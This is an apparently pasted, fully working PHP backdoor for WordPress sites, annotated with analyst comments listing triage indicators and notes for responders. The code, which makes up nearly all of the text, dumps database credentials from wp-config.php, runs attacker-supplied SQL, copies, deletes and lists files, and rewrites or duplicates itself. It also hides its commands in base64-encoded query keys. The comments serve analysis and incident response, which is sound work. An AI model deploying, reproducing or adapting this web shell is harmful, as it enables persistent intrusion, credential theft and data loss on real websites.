PalmaSolutions

sp7bbc45

Nov 2nd, 2018
  1. 19llp4OP4f
  2. <?php
/*
 * Password-gated PHP backdoor aimed at WordPress installs (self-reported VERSION '0.2.3').
 * Local variable names look machine-obfuscated ($sp7bbc45, ...); function names and string
 * literals are intact, which is what the notes below rely on.
 *
 * Request flow (the statements after the last function definition):
 *   - a query string holding exactly one parameter whose value is empty is treated as a
 *     wrapper: the parameter NAME is base64-decoded and parse_str()'d into $_GET;
 *   - $_GET is merged over $_POST, so every parameter named below may arrive by either method;
 *   - md5($_POST['password']) is compared with CONF_PASSWORD_HASH using ==; on mismatch the
 *     request ends with the body 'ympf';
 *   - action 'link' is served inline; any other value is dispatched through call_user_func()
 *     to the function named 'r_action_' followed by the action value.
 *
 * What becomes reachable after the password check: caller-supplied SQL run with the site's own
 * database credentials, disclosure of those credentials, file copy / delete / directory listing,
 * overwrite of this file, export of published posts, and deletion of cached pages.
 *
 * Strings and files visible in this listing that can serve as triage indicators: the
 * CONF_PASSWORD_HASH value, the 'ympf' reply, 'flog.log' appended to in the working directory,
 * temp files created via tempnam('./', 'wp') and tempnam('./', 'ert') with '.php' appended,
 * and the '[<{...}>]' wrapper around the 'link' reply.
 *
 * Dating hint: mysql_* was removed in PHP 7.0 and get_magic_quotes_gpc() in PHP 8.0; the
 * query and pages actions call r_unmagic() unconditionally.
 */
  3. define('EXT_MYSQLI', 'mysqli'); define('EXT_MYSQL', 'mysql'); define('CONF_PASSWORD_HASH', '0e618e1a7a4b45f63d10348b6b503a70'); define('VERSION', '0.2.3');
// r_get_lib: pick the DB extension name: 'mysqli' if the class exists, otherwise 'mysql' if
// mysql_connect() exists. Falls off the end (null) when neither is available.
function r_get_lib() { if (class_exists('mysqli')) { return EXT_MYSQLI; } if (function_exists('mysql_connect')) { return EXT_MYSQL; } }
// r_get_config_path: climb from the working directory one '../' at a time until a directory
// containing wp-config.php, index.php and wp-settings.php is found, and return it.
// The loop's only exit besides a match is the path comparing equal to '/'.
function r_get_config_path() { $sp7bbc45 = realpath('.'); $spb73a0e = 0; while ($sp7bbc45 != '/') { if (file_exists(sprintf('%s/wp-config.php', $sp7bbc45)) && file_exists(sprintf('%s/index.php', $sp7bbc45)) && file_exists(sprintf('%s/wp-settings.php', $sp7bbc45))) { return $sp7bbc45; } $spb73a0e++; $sp7bbc45 = realpath(str_repeat('../', $spb73a0e)); } }
// r_get_config: same upward walk, but every directory visited is appended to 'flog.log'
// (relative path, so it lands in the working directory). On a match it reads wp-config.php,
// keeps lines matching /define|table_prefix/i that do not match /defined/i, and eval()s them so
// the DB_* constants and $table_prefix exist here. DB_HOST is split on ':' into host and port
// (port defaults to 3306). Returns host, port, db, user, pass, prefix and the WordPress path.
// The 'break' after the return is unreachable.
// NOTE(review): the string literals below span a line break in this listing and carry the
// paste's list numbering; presumably the deployed file has a bare newline there. TODO confirm.
function r_get_config() { $sp7bbc45 = realpath('.'); $spb73a0e = 0; while ($sp7bbc45 != '/') { file_put_contents('flog.log', $sp7bbc45 . '
  4. ', FILE_APPEND); if (file_exists(sprintf('%s/wp-config.php', $sp7bbc45)) && file_exists(sprintf('%s/index.php', $sp7bbc45)) && file_exists(sprintf('%s/wp-settings.php', $sp7bbc45))) { $sp6448b2 = file(sprintf('%s/wp-config.php', $sp7bbc45)); $sp6448b2 = preg_grep('/defined/i', preg_grep('/define|table_prefix/i', $sp6448b2), PREG_GREP_INVERT); $sp6448b2 = implode('
  5. ', $sp6448b2); eval($sp6448b2); $spab89ed = 'table_prefix'; $spedb123 = explode(':', DB_HOST); $spa838dd = array_shift($spedb123); $spf32a62 = array_shift($spedb123); $spf32a62 = $spf32a62 ? $spf32a62 : 3306; return array('host' => $spa838dd, 'port' => $spf32a62, 'db' => DB_NAME, 'user' => DB_USER, 'pass' => DB_PASSWORD, 'prefix' => ${$spab89ed}, 'path' => $sp7bbc45); break; } $spb73a0e++; $sp7bbc45 = realpath(str_repeat('../', $spb73a0e)); } }
// r_mysql_connect: legacy ext/mysql connection to 'host:port' with the harvested credentials,
// then selects the configured database. Returns the link resource.
function r_mysql_connect($sp6448b2) { $sp52f15a = mysql_connect(sprintf('%s:%s', $sp6448b2['host'], $sp6448b2['port']), $sp6448b2['user'], $sp6448b2['pass']); mysql_select_db($sp6448b2['db'], $sp52f15a); return $sp52f15a; }
// r_mysqli_connect: mysqli connection. A numeric 'port' is passed as the port argument; a
// non-numeric one is passed as the socket argument instead and the port falls back to 3306.
function r_mysqli_connect($sp6448b2) { return new mysqli($sp6448b2['host'], $sp6448b2['user'], $sp6448b2['pass'], $sp6448b2['db'], is_numeric($sp6448b2['port']) ? $sp6448b2['port'] : 3306, !is_numeric($sp6448b2['port']) ? $sp6448b2['port'] : null); }
// r_mysql_query: each key of the bind array is str_replace()'d in the query text with its
// escaped value, then the query text is run as given. Returns array('success' => rows) or
// array('error' => 'errno :: message'). The first parameter (config) is not used.
function r_mysql_query($sp6448b2, $sp52f15a, $sp510788, $spdc632d = array()) { if (!empty($spdc632d)) { foreach ($spdc632d as $spb52fff => $sp211e9a) { $sp510788 = str_replace($spb52fff, mysql_real_escape_string($sp211e9a, $sp52f15a), $sp510788); } } $sp40206a = array(); $sp71e504 = mysql_query($sp510788, $sp52f15a); if ($sp71e504) { while ($sp31d1fe = mysql_fetch_assoc($sp71e504)) { $sp40206a[] = $sp31d1fe; } return array('success' => $sp40206a); } else { return array('error' => sprintf('%s :: %s', mysql_errno($sp52f15a), mysql_error($sp52f15a))); } }
// r_mysqli_query: mysqli counterpart of r_mysql_query. A result object yields
// array('success' => rows); a truthy non-object result (statement without a result set)
// yields array('success' => true); anything else yields the 'errno :: message' error array.
function r_mysqli_query($sp6448b2, $sp52f15a, $sp510788, $spdc632d = array()) { if (!empty($spdc632d)) { foreach ($spdc632d as $spb52fff => $sp211e9a) { $sp510788 = str_replace($spb52fff, $sp52f15a->real_escape_string($sp211e9a), $sp510788); } } $sp71e504 = $sp52f15a->query($sp510788); if (is_object($sp71e504)) { $sp40206a = array(); while ($sp31d1fe = $sp71e504->fetch_assoc()) { $sp40206a[] = $sp31d1fe; } return array('success' => $sp40206a); } if ($sp71e504) { return array('success' => true); } else { 
return array('error' => sprintf('%s :: %s', $sp52f15a->errno, $sp52f15a->error)); } }
// r_mysql_query_res: same bind substitution as r_mysql_query, but returns the raw result
// handle so the caller can fetch row by row. The $sp40206a array it creates is never used.
function r_mysql_query_res($sp6448b2, $sp52f15a, $sp510788, $spdc632d = array()) { if (!empty($spdc632d)) { foreach ($spdc632d as $spb52fff => $sp211e9a) { $sp510788 = str_replace($spb52fff, mysql_real_escape_string($sp211e9a, $sp52f15a), $sp510788); } } $sp40206a = array(); $sp71e504 = mysql_query($sp510788, $sp52f15a); return $sp71e504; }
// r_mysql_query_row: next associative row from an ext/mysql result, or false for a falsy result.
function r_mysql_query_row($sp71e504) { if ($sp71e504) { return mysql_fetch_assoc($sp71e504); } else { return false; } }
// r_mysqli_query_res: mysqli counterpart of r_mysql_query_res; returns whatever query() returned.
function r_mysqli_query_res($sp6448b2, $sp52f15a, $sp510788, $spdc632d = array()) { if (!empty($spdc632d)) { foreach ($spdc632d as $spb52fff => $sp211e9a) { $sp510788 = str_replace($spb52fff, $sp52f15a->real_escape_string($sp211e9a), $sp510788); } } $sp71e504 = $sp52f15a->query($sp510788); return $sp71e504; }
// r_mysqli_query_row: next associative row from a mysqli result object, or false otherwise.
function r_mysqli_query_row($sp71e504) { if (is_object($sp71e504)) { return $sp71e504->fetch_assoc(); } else { return false; } }
// r_unmagic: when magic quotes are on, stripslashes() every top-level $_POST value in place.
function r_unmagic() { if (get_magic_quotes_gpc()) { foreach ($_POST as $spb52fff => $sp211e9a) { $_POST[$spb52fff] = stripslashes($sp211e9a); } } }
// action 'prefix': echoes the WordPress table prefix taken from wp-config.php.
function r_action_prefix() { $sp6448b2 = r_get_config(); echo $sp6448b2['prefix']; }
// action 'query': runs the SQL in $_POST['query'] against the site's database.
// $_POST['bind'] is a JSON object of placeholder => value; keys listed (comma-separated) in
// $_POST['decode'] are base64-decoded before substitution, and result columns listed in
// $_POST['encode'] are base64-encoded before the result is echoed as JSON.
function r_action_query() { r_unmagic(); $sp6448b2 = r_get_config(); $sp20de71 = r_get_lib(); $spdc632d = json_decode($_POST['bind'], true); if (isset($_POST['decode'])) { $spb34ffd = array_map('trim', explode(',', $_POST['decode'])); foreach ($spb34ffd as $spc20910) { if (isset($spdc632d[$spc20910])) { $spdc632d[$spc20910] = base64_decode($spdc632d[$spc20910]); } } } $sp52f15a = call_user_func(sprintf('r_%s_connect', $sp20de71), $sp6448b2); $sp71e504 = call_user_func(sprintf('r_%s_query', $sp20de71), $sp6448b2, $sp52f15a, $_POST['query'], $spdc632d); if (isset($_POST['encode'])) { $sp6dca10 = array_map('trim', explode(',', $_POST['encode'])); foreach ($sp71e504['success'] as $spa5637e => $sp31d1fe) { foreach ($sp6dca10 as $spe3707f) { 
$sp71e504['success'][$spa5637e][$spe3707f] = base64_encode($sp71e504['success'][$spa5637e][$spe3707f]); } } } echo json_encode($sp71e504); }
// action 'update': overwrites this very file with the base64-decoded $_POST['file'] and echoes
// the MD5 of the new content. For responders: the on-disk copy may differ from this listing,
// so a file-hash match on this version alone is not sufficient to rule a host clean.
function r_action_update() { file_put_contents(__FILE__, base64_decode($_POST['file'])); echo md5(base64_decode($_POST['file'])); }
// action 'version': echoes the VERSION constant.
function r_action_version() { echo VERSION; }
// action 'duplicate': copies this file to the path in $_POST['dst'] and echoes 1 or 0.
// For responders: further copies under other names and paths are possible.
function r_action_duplicate() { $spdc3780 = copy(__FILE__, $_POST['dst']); echo (int) $spdc3780; }
// action 'copy': copies $_POST['src'] to $_POST['dst'] with no path restriction; echoes 1 or 0.
function r_action_copy() { $spdc3780 = copy($_POST['src'], $_POST['dst']); echo (int) $spdc3780; }
// action 'dir': lists $_POST['dir'] and echoes JSON entries with type (file/dir/unknown),
// entry name, joined path and realpath.
function r_action_dir() { $spdc3780 = array(); $spc20910 = dir($_POST['dir']); while (false !== ($spf7de93 = $spc20910->read())) { $spf359a4 = sprintf('%s/%s', rtrim($_POST['dir'], '/'), $spf7de93); $spdc3780[] = array('type' => is_file($spf359a4) ? 'file' : (is_dir($spf359a4) ? 'dir' : 'unknown'), 'entry' => $spf7de93, 'full_entry' => $spf359a4, 'realpath' => realpath($spf359a4)); } $spc20910->close(); echo json_encode($spdc3780); }
// action 'wpversion': scans wp-settings.php for the define(...) that mentions WPINC, strips
// matching first/last characters (the quotes) from its arguments, require_once's
// <wp root>/<WPINC value>/version.php and echoes $wp_version, then dies. Echoes 'error' if no
// WPINC define was found.
function r_action_wpversion() { $sp7bbc45 = r_get_config_path(); $sp09e4ed = file_get_contents(sprintf('%s/wp-settings.php', $sp7bbc45)); preg_match_all('/define\\(([^\\)]+)/i', $sp09e4ed, $sp0386fe); foreach ($sp0386fe[1] as $sp65229a) { if (strpos($sp65229a, 'WPINC') !== false) { $sp65229a = array_map('trim', explode(',', $sp65229a)); foreach ($sp65229a as $sp17114d => $spfcd819) { if ($spfcd819[0] == $spfcd819[strlen($spfcd819) - 1]) { $sp65229a[$sp17114d] = substr($spfcd819, 1, strlen($spfcd819) - 2); } } require_once $sp376b10 = sprintf('%s%s%s%sversion.php', $sp7bbc45, DIRECTORY_SEPARATOR, str_replace('/', DIRECTORY_SEPARATOR, $sp65229a[1]), DIRECTORY_SEPARATOR); $sp7156de = 'wp_version'; echo ${$sp7156de}; die; } } echo 'error'; }
// action 'w3tc': deletes _index.html and _index.html_gzip under
// wp-content/cache/page_enhanced/<url>/ where <url> is $_POST['url'] minus its scheme and
// trailing '/'. Always echoes 'success'. Presumably the W3 Total Cache page cache, going by
// the function name and directory. TODO confirm.
function r_action_w3tc() { $sp7bbc45 = r_get_config_path(); $sp95f4d5 = rtrim(preg_replace('/^http[s]{0,1}\\:\\/\\//i', '', $_POST['url']), '/'); $spb859b3 = sprintf('%s/wp-content/cache/page_enhanced/%s/_index.html', $sp7bbc45, $sp95f4d5); if (file_exists($spb859b3)) { unlink($spb859b3); } 
$spb859b3 = sprintf('%s/wp-content/cache/page_enhanced/%s/_index.html_gzip', $sp7bbc45, $sp95f4d5); if (file_exists($spb859b3)) { unlink($spb859b3); } echo 'success'; }
// action 'cenabler': same idea for wp-content/cache/cache-enabler/<url>/, deleting index.html,
// index.html.gz, index-webp.html and index-webp.html.gz. Always echoes 'success'.
function r_action_cenabler() { $sp7bbc45 = r_get_config_path(); $sp95f4d5 = rtrim(preg_replace('/^http[s]{0,1}\\:\\/\\//i', '', $_POST['url']), '/'); $spb859b3 = sprintf('%s/wp-content/cache/cache-enabler/%s/index.html', $sp7bbc45, $sp95f4d5); if (file_exists($spb859b3)) { unlink($spb859b3); } $spb859b3 = sprintf('%s/wp-content/cache/cache-enabler/%s/index.html.gz', $sp7bbc45, $sp95f4d5); if (file_exists($spb859b3)) { unlink($spb859b3); } $spb859b3 = sprintf('%s/wp-content/cache/cache-enabler/%s/index-webp.html', $sp7bbc45, $sp95f4d5); if (file_exists($spb859b3)) { unlink($spb859b3); } $spb859b3 = sprintf('%s/wp-content/cache/cache-enabler/%s/index-webp.html.gz', $sp7bbc45, $sp95f4d5); if (file_exists($spb859b3)) { unlink($spb859b3); } echo 'success'; }
// action 'removeshell': maps $_POST['shell_url'] onto DOCUMENT_ROOT and deletes that file
// unless it is this script. Echoes 'success', 'fail' (file still exists) or 'ignore' (absent).
function r_action_removeshell() { if (file_exists($spe29cd5 = sprintf('%s%s%s', rtrim($_SERVER['DOCUMENT_ROOT'], '/'), DIRECTORY_SEPARATOR, str_replace('/', DIRECTORY_SEPARATOR, ltrim($_POST['shell_url'], '/'))))) { if ($spe29cd5 != __FILE__) { unlink($spe29cd5); } echo file_exists($spe29cd5) ? 'fail' : 'success'; } else { echo 'ignore'; } }
// action 'remove': deletes the path in $_POST['file'] (any path, except this script) with the
// same 'success' / 'fail' / 'ignore' replies.
function r_action_remove() { if (file_exists($_POST['file'])) { if ($_POST['file'] != __FILE__) { unlink($_POST['file']); } echo file_exists($_POST['file']) ? 'fail' : 'success'; } else { echo 'ignore'; } }
// action 'pages': opens a new file named tempnam('./', 'wp') . '.php' for writing (tempnam()
// also creates the extensionless file of the same name), loads WordPress via wp-load.php, then
// selects published posts/pages with ID above $_POST['remote_id'], paged by batch_start and
// batch_size (all three interpolated into the SQL with sprintf). Each row is written as CSV:
// ID, base64(post_content), base64(post_title), base64(permalink). Echoes the file path.
// $sp951cf3 is assigned from $_POST['id'] but not used in this function.
function r_action_pages() { $sp86f829 = tempnam('./', 'wp') . '.php'; $spcbe118 = fopen($sp86f829, 'w'); $sp7bbc45 = r_get_config_path(); chdir($sp7bbc45); $sp951cf3 = $_POST['id']; require $sp7bbc45 . 
'/wp-load.php'; r_unmagic(); $sp6448b2 = r_get_config(); $sp20de71 = r_get_lib(); $spfe8955 = $sp6448b2['prefix']; $sp52f15a = call_user_func(sprintf('r_%s_connect', $sp20de71), $sp6448b2); $sp71e504 = call_user_func(sprintf('r_%s_query_res', $sp20de71), $sp6448b2, $sp52f15a, sprintf('SELECT * FROM `%sposts` WHERE `post_type` IN ( "post", "page" ) AND `post_status` = "publish" AND `ID` > %s ORDER BY `ID` ASC LIMIT %s, %s', $spfe8955, $_POST['remote_id'], $_POST['batch_start'], $_POST['batch_size'])); while ($sp31d1fe = call_user_func(sprintf('r_%s_query_row', $sp20de71), $sp71e504)) { fputcsv($spcbe118, array($sp31d1fe['ID'], base64_encode($sp31d1fe['post_content']), base64_encode($sp31d1fe['post_title']), base64_encode(get_permalink($sp31d1fe['ID'])))); } fclose($spcbe118); echo $sp86f829; }
// action 'config': echoes the full r_get_config() array as JSON, including the database
// user and password read from wp-config.php.
function r_action_config() { echo json_encode(r_get_config()); }
// action 'getlib': echoes which DB extension name r_get_lib() selected.
function r_action_getlib() { echo r_get_lib(); }
// action 'magic': echoes 'Yes' or 'No' for the magic-quotes setting.
function r_action_magic() { echo get_magic_quotes_gpc() ? 'Yes' : 'No'; }
// action 'loginurl': rebuilds this request's URL from HTTPS / HTTP_HOST / REQUEST_URI, replaces
// this script's basename at the end of the URL with a new tempnam('./', 'ert') name plus
// '.php', fetches that URL with file_get_contents() and echoes the response.
// NOTE(review): nothing in this function writes content to that '.php' name, and the regex
// only matches when the URL ends with the script name, so what is fetched cannot be
// determined from this listing.
function r_action_loginurl() { $sp6ce46b = (isset($_SERVER['HTTPS']) ? 'https' : 'http') . "://{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}"; $spf090ca = $sp6ce46b; $sp879d2d = basename(__FILE__); $sp86f829 = basename(tempnam('./', 'ert') . '.php'); $sp128ad6 = preg_replace(sprintf('/%s$/i', preg_quote($sp879d2d)), $sp86f829, $spf090ca); echo file_get_contents($sp128ad6); }
// Entry point. A lone empty-valued GET parameter is unwrapped (its name is base64 of a query
// string), which keeps readable parameter names and values out of the request line in access
// logs; log review should therefore look for a single long base64-looking key with no value.
// After merging $_GET over $_POST, the MD5 of 'password' is checked with a loose == against
// the embedded hash. 'link' echoes get_permalink($_POST['id']) wrapped as '[<{...}>]';
// every other action name is appended to 'r_action_' and called with no allow-list.
if (count($_GET) == 1 && !trim($sp429c33 = array_pop(array_values($_GET)))) { $sp71e504 = array(); parse_str(base64_decode(array_shift(array_keys($_GET))), $sp71e504); $_GET = $sp71e504; } $_POST = array_merge($_POST, $_GET); if (CONF_PASSWORD_HASH == md5($_POST['password'])) { switch ($_POST['action']) { case 'link': $sp7bbc45 = r_get_config_path(); chdir($sp7bbc45); $sp951cf3 = $_POST['id']; require_once $sp7bbc45 . 
'/wp-load.php'; $sp69ab9a = get_permalink($_POST['id']); echo sprintf('[<{%s}>]', $sp69ab9a); break; default: $sp392490 = sprintf('r_action_%s', $_POST['action']); call_user_func($sp392490); break; } } else { die('ympf'); }